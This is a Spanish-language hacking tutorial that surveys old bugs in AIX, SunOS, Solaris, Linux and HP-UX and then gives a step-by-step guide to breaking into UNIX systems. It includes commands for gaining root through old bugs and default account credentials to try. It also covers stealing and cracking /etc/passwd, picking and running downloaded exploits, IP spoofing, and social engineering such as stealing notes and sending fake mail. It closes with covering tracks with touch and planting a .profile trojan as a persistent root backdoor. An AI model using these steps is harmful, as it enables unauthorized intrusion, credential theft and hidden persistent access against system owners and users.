    Inicialmente podemos dividir los sistemas UNIX según el tipo (BSD, System V, etc...). Pero en este capítulo vamos a hacer una distinción según los fabricantes de cada sistema UNIX:

AIX - Fabricado por IBM

SunOS y Solaris - Fabricados por Sun

HP-UX - Fabricado por Hewlett Packard

Ultrix y OSF/1 - Fabricados por DEC


Aunque Linux no ha estado fabricado por ninguna multinacional, he creído conveniente incluirlo en esta lista.

Linux - UNIX para PC, no ha sido fabricado por ninguna multinacional


Estos son los más importantes, después hay otros como el IRIX, el Convex, el UnicOS... de menor proliferación.

Voy a describir cinco de estos sistemas: AIX, SunOS, Solaris, Linux y HP-UX.


AIX:

    AIX es la versión UNIX de IBM. Desde que salió ha sido de los sistemas que más bugs ha presentado. Para que tengas una idea, la versión 3.25 tenía fallos tan gordos como estos:

   
1 - El comando lquerypv podía ser utilizado para leer cualquier archivo:



$ lquerypv -h /etc/passwd

root:Xds4cdXcMoV:0:0::/root:/bin/bash

...

   
2 -
Este bug habla por sí solo:



$ echo "badboy::0:0:blablabla:/:/bin/sh" >>/etc/shadow

$ telnet localhost

login: badboy

# whoami

root

   
3 -
Otro bug:

$ rlogin localhost -l -froot

# whoami

root

   
4 -
Y otro bug que permite enROOTarse:



$ tproof -x /bin/sh

Naturalmente, existen parches para estos bugs tan tontos.

La versión 3.25 fue substituida por la 4.1, aunque esta también presenta errores (como todos los sistemas). Estos son los cambios de la 3.25 a la 4.1:



Versión 3.25 y 4.1.x

Tanto la versión 3.2.5 como la 4.1 de AIX son compatibles con los tres sistemas IBM RISC System/600 (POWER, POWER2 y PowerPC 601). La versión 4.1, además, incorpora compatibilidad con sistemas PowerPC.

En la versión 4.1 se incluyen los estandartes de programación POSIX 1003.2 y 1003.2a, FIPS 151-2 y XPG4.

Las librerías TCP/IP permiten el uso de BIND y NIS para resolver direcciones IP.

En la versión 4.1, el IP forwarding está, por defecto, desactivado.


SunOS

Se trata de un sistema de la casa Sun. Estos son sus fallos:

    El SunOS, es, inicialmente vulnerable a IP Spoofings, si la opción Source routing está activada. Aunque, para que SunOS sea totalmente seguro a un ataque de spoof, se tienen que introducir ciertas modificaciones en el kernel referentes a IP forwarding. Por eso, probablemente en este sistema una táctica muy aconsejable es el IP Spoofing.

SunOS También presenta fallos en la configuración NFS, a no ser que esté activado el NFS por monitoring (por defecto no lo está).

Un fallo muy importante es que, inicialmente, la librería ruserok(3) permite el acceso a .rhosts y a hosts.equiv con cualquier comando "r".

El fichero /dev/eeprom es inicialmente leíble por cualquier usuario, pero este suele ser un bug que casi todos los admins suelen solucionar. Otro bug tonto: muchos admins dejan activada la cuenta "sync" sin password.

Linux
    Linux es el famoso sistema operativo disponible para PC y para otras plataformas. Añade a UNIX un SO de 32 bits, soporta multitud de dispositivos (PCI, SCSI...) y es capaz de leer FAT32 y NTFS. Se trata de un sistema especialmente estable y fiable, poco propenso a colgarse. Pone a disposición del usuario el código fuente del Kernel. Funciona en un 386 con 4 de RAM, gracias a que sólo utiliza los recursos que necesita.( ojo esto ya ha quedado muy lejos, dado que las ultimas versiones de linux consumen tantos o mas recursos que windows, por ejemplo la red-hot 6.2 la instalacion minima requiere 500Mg. la de Corel una de las mas pequeñas y parecida a win 300 Mg,   si queres probar con una distribucion viejita que si cabe en pequeñas pc tenes que instlarte la red-hot 5.2, pero te diria que te vas a venir loco para navegar dado que trae fallos ( esa es la manera que yo interpreto) en el netscape Es multitarea y incorpora un entorno gráfico parecido a Windows 98, llamado X-Windows. Hay diferentes distribuciones de Linux, y no todas son gratuitas, las más importantes (gratuitas) son:

Slackware : Se puede conseguir en ftp.cdrom.com:/pub/Linux/slackware.

Debian: Para conseguirla, se puede hacer un ftp a ftp.debian.org o en slug.ctv.es.

Red Hat: ftp.redhat.com para conseguirla.


Como principales bugs voy a destacar:

En Debian Linux 2.0, /usr/bin/suidexec permite nivel de root a cualquier usuario.

En cualquier sistema Linux se puede sobreescribir un buffer en /usr/X11/bin/color_xterm para obtener nivel root.

En cualquier sistema Linux se puede exploitar la librería vsyslog() 5.4.38 para obtener root.

Aunque es un bug muy viejo, se puede obtener nivel root sobreescribiendo un buffer en /usr/bin/splitvt

En distribuciones RedHat de Linux, se puede conseguir nivel root sobreescribiendo un buffer en /usr/bin/zgv

Solaris
    Se trata de un sistema mejorado de la misma casa que SunOS (por supuesto, SUN). Las últimas versiones de este sistema se caracterizan por contener un mejorado sistema de WebNFS.

Pero como todo sistema, Solaris tiene también muchos bugs. Los más importantes son:

Se pueden crear o borrar cualquier tipo de ficheros como si fuésemos root usando el statd (sólo en la versión 2.5.1)

el sistema se cae si el syslog recibe un mensage y no puede resolver la IP que lo ha producido.

En cualquier sistema Solaris 2.x, podemos petar o reiniciar el sistema con un ping flood (enviando una gran cantidad de paquetes de manera que se quede bloqueado)

Se pueden aprovechar los archivos /usr/bin/ps y /usr/ucb/ps para conseguir acceso root en cualquier sistema Solaris

Así mismo, sobreescribiendo un búfer determinado en /usr/bin/fdformat también podemos conseguir root en cualquier Solaris 2.x

También se puede aprovechar y explotar /usr/lib/nis/nispopulate en los sistemas Solaris 2.5

Sobreescribiendo un búfer determinado en el archivo passwd podemos enROOTarnos, sólo en la versión 2.5, igualmente, en esta versión podemos explotar /usr/openwin/bin/kcms_calibrate para obtener root

HP-UX
HP-UX ha sido fabricado por la conocida multinacional Hewlett Packard. Se han hecho multitud de versiones de este sistema, tanto es así que una de las últimas versiones es la 9.01. A diferencia de otros sistemas UNIX, presenta pocos bugs, de los cuales destaco:

    SAM (System Administration Manager) puede ser usado en cualquier sistema HP-UX para modificar archivos.

    En la versión HP-UX 9, el programa rpc.mountd contiene un bug que puede ser explotado para obtener privilegios NFS.

Capítulo 4
Entrar en un sistema y "enrootarse"
En esta unidad aprenderás:
Cómo recoger información del sistema al que queremos entrar
Técnicas para entrar sin tener una cuenta en el sistema
Cómo conseguir root dentro del sistema
Qué hacer una vez se es root en el sistema
Cómo asegurar el futuro acceso al sistema una vez se es root

Si estás aquí se supone que sabés:

Lo que es en realidad el hacking

Para qué sirve el hacking

Cómo se comporta un hacker

Qué es LINUX

Iniciarse en el entorno LINUX/UNIX

Entender el entorno multiusuario UNIX

Otros ejercicios prácticos para LINUX

Mucho sobre sistemas UNIX

Clasificación de sistemas UNIX

Características de los diferentes sistemas UNIX


Bien, estamos ante la lección clave de este curso. Para entenderla, es esencial que hayas leido las lecciones anteriores, especialmente la 1 y la 2.

Entrar en un sistema:
Esta es la acción principal y primordial para hackear.

La acción de entrar en un sistema se puede dividir en dos fases :

Recopilacion de informacion

Incursión en el sistema:

o bien

A través de una cuenta shell

A través de otros métodos

Pero también tenemos que saber que la entrada en un sistema puede ser, según el nivel de privilegio:

Directamente como root

Como usuario normal

como usuario anónimo (pero esta última queda descartada ya que como usuario anónimo no podemos hacer prácticamente nada.)

Así pues, antes de entrar en un sistema (aunque ya tengamos una cuenta shell), tenemos que pasar por la etapa de recopilacion de informacion

1 - Recopilacion de información
La información que debemos saber de cualquier sistema la vamos a dividir en:

Información primordial

Información extendida

Información complementaria

La información primordial la tenemos que saber sea como sea, si no, ya nos podemos olvidar del sistema y buscarnos otro. La información extendida nos será de utilidad más adelante, y la complementaria... bueno, siempre va bien tenerla.

Información primordial: cuál es y cómo se consigue
La información primordial de cualquier sistema es qué Host/IP tiene, así como la versión de UNIX que usa. Si tenemos el host y queremos saber la IP, basta con teclear:



# nslookup <host>

Una vez sabemos el Host/IP de un sistema, tenemos que hacer un telnet a éste y observar qué versión de UNIX usa. El nombre del sistema nos basta para la información primordial (si es SunOS, si es Solaris, si es Linux, etc...).



# telnet <host>
SunOS v3.25
login:

Información extendida: cuál es, para qué usarla y cómo se consigue
Al hacer el telnet, no estaría mal que apareciese qué versión (sea el UNIX que sea) está usando. Es un dato que puede ayudarnos a elegir exploits para usarlos más adelante.

Otro dato que nos puede ayudar (y mucho) es la versión de Sendmail que usa. Esto lo conseguimos haciendo un telnet al puerto 25 del host.


Nota: si el sistema que queremos hackear no permite hacer un telnet al puerto 25, deberemos descartar cualquier ataque vía Sendmail.

Para hacer un telnet al puerto 25 del host, escribimos simplemente esto:



# telnet <host> 25

Y nos aparecerá una línea con la versión del Sendmail.

Otra información extendida importante es saber detectar si el host tiene alguna actividad NFS. NFS (Network File System) es un sistema por el cual un ordenador puede compartir directorios con otros ordenadores, de manera que estos pueden manejar dichos directorios como si fuesen suyos. En muchos sistemas UNIX, el NFS está mal configurado, lo que supone un fallo de seguridad. Para saber si este sistema recibe directorios NFS, y si es que sí, cuáles son, escribiremos:



# showmount -e <host>

Podríamos considerar importante más información, pero con esta ya tenemos de momento suficiente.

Información complementaria

    Siempre va bien saber, por ejemplo, qué tipo de sistema es (si es gubernamental, si es una universidad...), en qué sitio geográfico está situado, cuánto tiempo lleva on-line, qué servicios ofrece, y un largo etcétera.

Hay muchos programas como por ejemplo el nmap, que se usan para saber que tipo de sistema operativo se esta usando, este programa tiene la caracteristica que nos dice hasta que version es, por
ejemplo linux red-hot 6.2 , solaris 6.0 etc,tiene a su ves funciones que no permiten al otro sistema leer
nuestra direccion ip puesto que usa una tecnica muy avanzada para peticionar la informacion, pero por
el momento no te preocupes por esto ya que deberas saber lo basico.

2 - Incursión en el sistema
    Bien, ahora que ya tenemos suficiente información vamos a tratar algunos de los métodos que se suelen usar para entrar en un sistema (los más fáciles, por supuesto).

Si ya tenemos una cuenta shell, nos basta con entrar vía telnet, poner el login y el password y ya estamos dentro. Si este es el caso, deberemos pasar a ver cómo podemos obtener root.

Pero si estamos en nuestro ordenador y no tenemos ni siquiera un login,,y no sabemos qué hacer para poder entrar, antes que nada probaremos los métodos que sólo funcionan de vez en cuando, métodos que pueden parecer anti-elitistas, pero que muchas veces nos ahorran esfuerzo mental si, de casualidad, funcionan, claro está.

Un ejemplo puede ser un rlogin . Por increíble que parezca, mi primera incursión en un sistema fue gracias a esta táctica. Simplemente escribimos:



# rlogin <host>

Y hay una probabilidad entre 100 de que entremos. Pero lo bueno es que entramos directamente como root, que fue lo que a mi me sucedió. Lo que ocurre es que, al no especificar con qué nombre (login) queremos entrar en el sistema, el comando entiende que queremos entrar como root, y como no hemos puesto password, entiende que el password es simplemente, ENTER (o sea, nada). En otras palabras, que hemos entrado con la cuenta de root sin asignar password, el root no tiene aun un password asignado, cosa que es prácticamente imposible (para qué negarlo) ¡ Pero nunca está de más probarlo !

Y otra táctica de este tipo consiste en hacer lo mismo, pero usando las "default counts", que son las cuentas que vienen por defecto en cualquier sistema UNIX, y, a no ser que el root les cambie el password o las desactive, se pueden usar. Esto es bueno probarlo porque algunas veces el root solo actualiza las cuentas que usa y las otras las deja activadas. Las default counts, en sistemas UNIX son:



Login / Password

admin - admin
sysadmin - sysadmin o admin
unix - unix
uucp - uucp
rje - rje
guest - guest
demo - demo
daemon - daemon
sysbin - sysbin
bin - bin




Las cuentas bin son muy interesantes ya que permiten la manipulación de muchos ficheros importantes como el fichero passwd.

adm - adm
nuucp - nuucp
lp - lp

Si con éstas no funciona, entonces tenemos que pensar un poco más. Vamos a ver, si el sitio al que nos conectamos se llama por ejemplo "Daddy's INC", no estaría de más probar a entrar como daddys, o daddy.

Algunos sistemas UNIX tienen una cuenta llamada test abierta, sin password, o con el mismo login y password (test/test).

En unos pocos sistemas UNIX, podemos ejecutar algunos comandos en el prompt de login. Estos pueden ser básicamente tres:



who
rwho
finger

Con lo que podemos saber si hay alguien dentro del sistema. Y, si hay alguien, ya tenemos el login de un usuario. Imaginemos que hay un tal "pepe" conectado. Probablemente, será de esos que prefiere conectar rápido al sistema y no le ha pasado nunca por la cabeza que algún hacker pueda usar su cuenta. Así que no estaría de más intentar entrar como pepe y poner como password pepe, pepe1, pp, o lo que se nos pase por la cabeza...

Bueno, como seguramente no hemos entrado en el sistema, ya nos podemos quitar las legañas y pasar a hacer algo más serio. Si seguimos fuera del sistema, tenemos varias opciones:

Explotar el Sendmail

Explotar el NFS mediante un IP Spoofing

Lo primero, consiste en usar el sistema de Mail del ordenador para obtener privilegios de root. Esto se hace aprovechando los fallos que presenta según la versión que use (ver información extendida). Así que a partir de ahora ya podemos empezar a usar exploits para hacer nuestras tareas más fáciles. Muchos no sabran de lo que estoy hablando. Así que vamos a explicar lo que es un exploit.


Un exploit:
no es más que un programa que aprovecha los bugs de un sistema UNIX determinado. Hay, por supuesto, muchos exploits, para cada tipo de sistema, y diariamente van saliendo nuevos según los sistemas se actualizan y se van encontrando nuevos fallos. Los buenos hackers saben programar sus propios exploits, pero de momento vamos a usar los que ya están hechos. Una dirección donde podemos encontrar muchos es: www.rootshell.com. Los exploits están programados en C o en shell. Y, dentro de la programación en shell podemos encontrar diferentes tipos, según el tipo de shell en que se base (BASH, PERL...). Una vez tenemos el exploit que queremos usar, debemos editarlo, leer las instrucciones que contenga (muchos contienen lineas de texto haciendo referencia a las maneras que hay de usarlo, cómo hay que usarlo para que funcione de una manera u otra, etc) y salvar sólo la parte ejecutable (ya sea en shell o en C). Si está en C tendremos que compilar el exploit. Si está en shell, basta con darle permiso de ejecución y ya está listo para usar. Poco a poco  iré hablando de las diferentes maneras de usar los exploits.

Ahora que ya sabemos lo que es un exploit, podemos ir a cualquier site y bajarnos todos los que haya referentes a la versión de Sendmail que usa este sistema, compilarlos (si necesitan ser compilados), y usarlos.

Realmente, el sistema de Mail de UNIX es muy útil para hacer fake mails, una vez dentro del sistema. Podemos hacernos pasar por cualquier dirección de correo existente.



    Es importante la organización de los exploits en el disco duro, la mejor manera es clasificarlos según: qué tipo de exploit son y a qué sistema hacen referencia.

    Bueno, los exploits locales son una buena manera de entrar directamente, pero no siempre funcionan, sobretodo porque los mismos exploits suelen tener bugs y tenemos que saber modificarlos, pero por esto de momento no te preocupes. Hay, por supuesto, técnicas más avanzadas para entrar en sistemas. Una de ellas es el IP Spoofing.

    El IP Spoofing nos permite cambiar nuestra IP.  pero ¿ Qué ganamos con eso ? Bien, supongamos que el sistema al que queremos entrar está en una subred, y, por lo tanto, se comunica con sistemas trusteds, sistemas que son "colegas". ¿ Qué quiere decir que son colegas ? Pues que están comunicados entre sí y que por lo tanto tienen ciertos privilegios (tienen acceso a directorios compartidos vía NFS). Los programas de IP Spoofing lo que hacen es (de manera simplificada), intentar comunicar con un sistema trusted (colega del sistema al que queremos entrar), hacer que no responda y en ese intervalo de tiempo alterar nuestra IP para hacernos pasar por ese sistema, de manera que ya tenemos ciertos privilegios en el sistema en el que queremos entrar.

    Lo primero que tienes que hacer para poner en práctica esta táctica es bajarte un buen programa de IP Spoofing. Mejor bájate varios por si alguno no funciona. Ahora tienes que saber cuáles son los sistemas trusteds del sistema al que quieres entrar. En otras palabras, qué estructura NFS tiene. Para esto escribe lo siguiente:



# showmount -e <host>

Por otra parte, esto ya lo tendrías que haber hecho al recopilar la información del sistema.

    Y, con estos datos, ya puedes ejecutar el programa de IP Spoofing, que seguramente lo hará todo él solito. No olvides compilarlo (si está en C) y quitar las instrucciones.

    En teoría con todas estas técnicas puedes pasarte un buen rato intentando entrar en un sistema. He dejado muchas técnicas por explicar y las que he descrito las he descrito muy por encima, porque considero que un hacker novicio ha de empezar siempre teniendo shells. Es decir, que ya conozcas de antemano alguna cuenta en ese sistema, eso facilita muchísimo las cosas. La única manera de conseguir una sino puedes ni siquiera entrar de forma anónima en un sistema es utilizar la ingeniería social. Si conoces el lugar físico en el que está ubicado el sistema, tienes que relacionarte con la gente que accede a él, robar papelillos o buscarlos en la papelera, espiar, hacer lo que sea hasta conseguir una cuenta en el sistema. El IRC puede ser un buen medio, pero también tienes que saber pedir las cosas. Internet, en definitiva, es un buen medio. Alguna que otra página encontrarás con shells. El fake mail puede ser también útil, hacerte pasar por alguna dirección importante de un proveedor de internet y enviar un mail a un usuario de ese proveedor para de alguna manera averiguar su login y password, aunque para eso tienes que estar antes en un sistema UNIX, y no todos los sistemas UNIX permiten hacer fake mails, o sea que esta técnica queda descartada. Pero si buscas información al respecto no te estará de más.

Conseguir ROOT una vez dentro del sistema

    Bien, si hemos conseguido finalmente entrar en el sistema con shell de usuario ordinario, tenemos muchas cosas que hacer. Lo primero que querremos hacer es, por supuesto, ver qué posibilidades nos ofrece nuestra cuenta.

1 - Hacemos un listado de nuestro directorio de inicio

2 - Miramos qué programas colectivos podemos ejecutar

3 - Echamos un vistazo al archivo .profile

    Nuestro directorio de inicio, dependiendo de en qué tipo de ordenador estemos estará generalmente ocupado por programas en C o documentos relacionados con carreras universitarias (si estamos en una universidad). Conviene no modificar ninguno de estos elementos, porque el usuario real de esta shell se daría cuenta de que la fecha ha cambiado. Y aún peor si se nos ocurre borrarlos. Simplemente les echamos un vistazo (si nos interesa, claro).   

    Ahora ejecutamos el comando help para ver qué programas colectivos podemos ejecutar (editores de texto, programas de mail, etc...). Y por último, no nos irá mal saber qué hay en nuestro .profile, y, si tenemos que modificarlo, no tenemos que olvidar volver a poner la fecha original (con el comando touch).
  
    Después tenemos que intentar movernos del directorio en el que estamos, a ver si podemos explorar otras áreas del sistema. Si no podemos, no hay que desesperarse. Quizás sí podemos leer ficheros del sistema aunque no podamos movernos del directorio, por eso tenemos que probar a hacer esto:



$ cat /etc/passwd

Si estamos de suerte y sale algo, pues grabamos la información en un fichero nuestro.



$ cat /etc/passwd >> passwd

Y ya tenemos el archivo passwd.

Ahora vamos a mirar más archivos importantes



$ cat /etc/hosts

    Este archivo te mostrará todos los sistemas que están en la subred del sistema en el que estás. Esto te puede ser útil porque, si te cierran la cuenta aquí, probablemente puedas intentar entrar en algún sistema de la misma subred con la misma cuenta. Si te interesa, salva esta información en otro archivo.

Ahora vamos a ver qué podemos hacer con el archivo passwd.

    Como ya sabes, este fichero contiene las cuentas del sistema. También sabes qué elementos contiene. Cuando dije que contenía el password del usuario dije que nunca aparecía tal y como era. El password puede aparecer de varias formas:
Shadow
    Cuando el password está shadow, en realidad se encuentra en otro archivo que se llama shadow, que no es visible más que por el root. En este caso no podemos hacer nada. Aparece shadow si aparece como un asterisco o una x:



Anastasio:*:1500:10:Anastasio Fernandez:/usr/anastasio:/bin/sh
Anastasio:x:1500:10:Anastasio Fernandez:/usr/anastasio:/bin/sh
Encriptado
    El password está encriptado si está formado por una combinación muy extraña de carácteres. Esta combinación no es el password en sí, sino el password encriptado. En este caso sí podemos hacer algo, es más, tenemos muchas posibilidades de descubrir de qué password se trata. Lo que tenemos que hacer es bajarnos un buen desencriptador de passwords. Yo suelo usar el John The Ripper, es un desencriptador muy bueno. Los desencriptadores suelen funcionar intentando asociar una serie de palabras agrupadas por temas a los passwords encriptados. Estas agrupaciones se llaman diccionarios y también se pueden bajar. Aunque, si queremos desencriptar bien las contraseñas hay algunos desencriptadores que hacen una desencriptación completa, sin usar ningún diccionario, prueban todas las combinaciones posibles. Lo malo que tiene este sistema es que el proceso de desencriptación puede tardar muchas horas, pero vale la pena sobretodo si tienes un archivo de passwords con una cuenta root encriptada.

    Los desencriptadores, por supuesto, funcionan off-line. Así que lo que tienes que hacer si has conseguido el archivo de contraseñas encriptado es desconectar y probar a desencriptarlo.

Una cuenta encriptada tiene este aspecto:



Anastasio:Mo54Wasl6H:1500:10:Anastasio Fernandez:/usr/anastasio:/bin/sh
Normal
    Si encuentras alguna cuenta así, te mereces un premio, porque prácticamente es imposible de encontrar. Simplemente la contraseña se muestra tal cual es.



Anastasio:juana:1500:10:Anastasio Fernandez:/usr/anastasio:/bin/sh
Sin password
    En este caso no hay password, para acceder con esta cuenta simplemente hacemos telnet, ponemos el login y ya estamos dentro.



Anastasio::1500:10:Anastasio Fernandez:/usr/anastasio:/bin/sh
Nota: Hay que tener en cuenta que si nos encontramos un espacio en blanco, un asterisco o un signo de admiración delante del password, la cuenta está inhabilitada temporalmente, eso significa que el acceso del usuario al sistema ha sido restringuido por el admin (¡ o por un hacker !).

    Bueno, crackear el archivo password es una posibilidad a tener en cuenta para conseguir acceso root, averiguando cuál es la contraseña que usa el root. En el hipotético caso de que lleguemos a saber cuál es la contraseña del root, lo que tenemos que hacer es, ante todo, no cambiarla (una vez estemos dentro como root). Después, pasar a mirar la parte de esta unidad referente a qué hacer cuando se es root.

    Si lo del archivo passwd no ha resultado, vamos a pasar a intentar buscar defectos en el sistema en el que estamos. Ya podemos ir preparando los exploits que necesitemos. Ahora bien, ¿ Con qué criterio hay que elegirlos ? Los exploits que ejecutes en el sistema tienen que cumplir siempre estas condiciones:
1 -
La más trivial, que hagan referencia al sistema UNIX en el que estás. No ejecutes un exploit para HP-UX si estás en un Solaris.
2 -
Que hagan referencia a la versión exacta del sistema UNIX en el que estás. De una versión a otra se corrigen los errores, por lo tanto un exploit para AIX 3.25 no funcionará en un AIX 4.x
3 -
Que sean lo más nuevos posibles. Los exploits aparecen a medida que se van encontrando los errores en los sistemas. Por lo tanto, hay más posibilidades que el admin del sistema no haya tenido tiempo a parchear el bug al que haga referencia el exploit. En ciertos sites como rootshell.com aparecen exploits nuevos cada mes.
4 -
Que hagan lo que necesitas que hagan. Leete qué es lo que hacen, inicialmente te interesa ganar acceso root, pues busca solo los que hagan esto. No te interesará, por ejemplo, hacer caer el sistema, ni colocar un sniffer. También habrán exploits que para ejecutarlos necesitarás ser root en el sistema ¡ Tampoco te interesan !

    No todos los exploits son iguales, eso es algo que ya hemos comentado antes. Antes he mencionado la palabra exploit local. Llegados a este punto, tienes que entender la diferencia entre exploit local y exploit remoto:

- Exploit local: tanto si está en C como en Shell, tiene que ejecutarse sin estar conectado a ningún sistema (¡ pero sí a Internet !).

- Exploit remoto: Si está en C, hay que subir el código fuente al sistema y compilarlo DENTRO del sistema. Una vez compilado se ejecuta. Si está en Shell simplemente hay que subirlo al sistema y ejecutarlo dentro del sistema.

Ahora vamos a ver cómo podemos poner a punto nuestro exploit. Debes seguir este proceso:
1 -
Descomprime el exploit si está en formato .tgz. Esto lo puedes hacer con:



# tar xfvz <nombre del archivo>.tgz
2 -
Edita el exploit.

    Te encontrarás con que algunos exploits no son más que un archivo de texto explicando cómo aprovechar un bug. Si este es el caso, léete cuidadosamente el archivo y apunta en un papel lo que te diga que tienes que hacer (normalmente te dirá que usando un comando de tal manera puedes conseguir root o leer ciertos archivos...). Otros exploits serán shellscripts, y al principio habrán las instrucciones. Tienes que leértelas bien, y guardar en otro archivo solo el shellscript (quitando las líneas de texto que sobren). Para poder ejecutarlo tienes que darle permiso de ejecución. Otros serán programas en C, en este caso si hay instrucciones, estas son ignoradas al compilar, así que no hay problema. Ya sabes que si es un exploit remoto tienes que subir el código al sistema (esto puedes hacerlo a través de una sesión FTP, usando el mismo login y el mismo password que para la sesión telnet), y una vez dentro, compilarlo (haciendo una sesión telnet) usando esta línea:



$ gcc <archivo>.c

    Y el resultado de esta operación será un archivo llamado a.out, que tienes que renombrar a tu gusto ( o ejecutar directamente con ese nombre ).

Hay exploits que son una mezcla entre C y shellscript, es decir, que una parte está en C y otra en shell. En este caso tienes que separar las dos partes en dos archivos distintos y hacer lo que ya sabes.
3 -
La última parte es ejecutarlos, esperando que funcionen. Suelen funcionar si el sistema no está parcheado al máximo.

Experimenta por ti mismo todo lo referente a exploits, ahora que ya sabes cómo utilizarlos.

    Pero recuerda, si los exploits que has seleccionado no funcionan, no hagas el tonto subiendo otros que sabes que no van a funcionar. Debes saber que todo lo que haces en un sistema UNIX queda registrado en varios logs (algo que veremos en la próxima lección), así que si en una sesión no has conseguido hacerte root, al cabo de un día tu cuenta estará cerrada porque, probablemente, el admin se habrá dado cuenta de que has estado haciendo cosas "sospechosas". Por si acaso, si te tienes que ir, no olvides dejar el directorio de inicio del usuario tal y como estaba. Si te dejas tus exploits ahí, te puedo asegurar que te van a cerrar la cuenta pase lo que pase (porque el usuario se dará cuenta y lo comunicará al admin). También he comentado que, si has modificado algún archivo ya existente, tienes que volver a ponerle la fecha que ya tenía con el comando touch.

Pero si te han cerrado la cuenta, lo que tienes que hacer es buscarte más shells y seguir practicando.

Si has conseguido nivel root, vamos a pasar a explicar qué es lo que tienes que hacer.

¿ Qué hacer una vez se es ROOT ?

    Una vez eres root, el sistema es tuyo. No hay ningún tipo de restricción, puedes pasearte por el sistema como si fuese tuyo. Es muy importante, cuando se es root, asegurarse de que nos vamos a ir sin dejar ninguna huella. Pero esto lo voy a explicar en la próxima lección. Así mismo, si queremos asegurarnos nuestra continuidad como hacker en ese sistema, tenemos que ingeniarnos algún método para que podamos entrar y salir siendo siempre root. Una manera sería hacer el mismo proceso que hemos hecho para conseguir root. Pero, ¿ Y si es un proceso demasiado largo ? ¿ Y si tenemos root y no sabemos ni cómo lo hemos conseguido ?

    Podríamos crear una cuenta con acceso root, pero el admin del sistema lo acabaría viendo. Lo que podemos hacer es usar el .profile del root para asegurarnos el futuro acceso mediante un caballo de troya.

    Muchos se preguntaran ¿ Qué es un caballo de troya ? Bueno, un caballo de troya no es más que un proceso oculto. Vamos a verlo mediante un ejemplo muy sencillo:

Caballo de troya 1
Vamos a meter un caballo de troya en el archivo .profile de un usuario normal. Nos movemos a su directorio de inicio.

Lo primero que hacemos es una copia del archivo original a un archivo temporal oculto:



# cp .profile .temp

Ahora, editamos el archivo .profile y añadimos estas líneas al final:



echo " Bienvenido, Anastasio Fernández "
echo " Que tengas un buen día. "
echo " ¿ A que no sabes cómo te están llegando estas líneas ? "

Y la línea más importante que tenemos que añadir es:



mv .temp .profile

¿Qué hemos hecho con esto?. Acabamos de ocultar un proceso, en este caso un mensage de bienvenida. El archivo original .profile estaba guardado en en uno temporal (.temp). De manera que cuando Anastasio entra en el sistema, su .profile (que es el que hemos modificado) se encarga de ocultarse moviendo el contenido del archivo temporal otra vez al archivo profile, de manera que cuando Anastasio mire en su .profile no verá nada anormal. Excepto la fecha de modificación, pero eso lo podemos arreglar añadiendo un comando touch al final del caballo de troya.

Naturalmente no es muy recomendable hacer esto, ya que a un usuario normal no le haría mucha gracia y comunicaría al admin que ha entrado un hacker en el sistema.

Ahora que ya sabemos qué es un caballo de troya, vamos a hacer el caso que nos ocupa:

Caballo de troya 2
Vamos a hacer que un usuario normal consiga root instantáneamente al entrar en el sistema.

Hacer una copia del .profile del root en el directorio de inicio de un usuario normal

Convertir esta copia a ejecutable

Hacer una copia del .profile del usuario normal a un archivo temporal oculto

Modificar el .profile para que el usuario, cuando entre:

Ejecute el .profile de root

Borre el .profile de root

Mueva el contenido de la copia de su .profile (temp) a su .profile real

Si seguiste las lecciones hasta aquí no tendras problema en hacer este caballo de troya.

Pero para los más despistados, aquí está el proceso:



# cd /root
# cp .profile /usr/anastasio/.runme
# cd /usr/anastasio
# chmod a+x .runme
# cp .profile .temp
# ed .profile


Y añadimos:

.runme
rm .runme
mv .temp .profile

    Así, cada vez que entremos con la cuenta de Anastasio, seremos root. Naturalmente también puede ser que Anastasio Fernández, el usuario real de la cuenta, entre y vea que es root. Por eso recomiendo hacer esto: salir del sistema a hacer lo que tengamos que hacer, y al cabo de un rato volver a entrar (seremos root) y no volver a hacer este caballo de troya. Si en este intervalo de tiempo ha entrado Anastasio Fernández, ya no hay nada que hacer. Pero siempre podemos pensar que hemos hecho feliz a alguien.

    Bueno, siendo root se pueden hacer infinidad de cosas. Si quieres, disfruta de tu limitado acceso root (ahora que no sabes cómo borrar tus huellas) curioseando por el sistema. No te recomiendo que borres nada. Simplemente mira a ver qué hay. Y, ahora que sabes hacer caballos de troya, puedes divertirte haciéndolos en los .profile's de los usuarios normales. Por ejemplo, puedes poner un mensaje personal si conoces a alguien del sistema.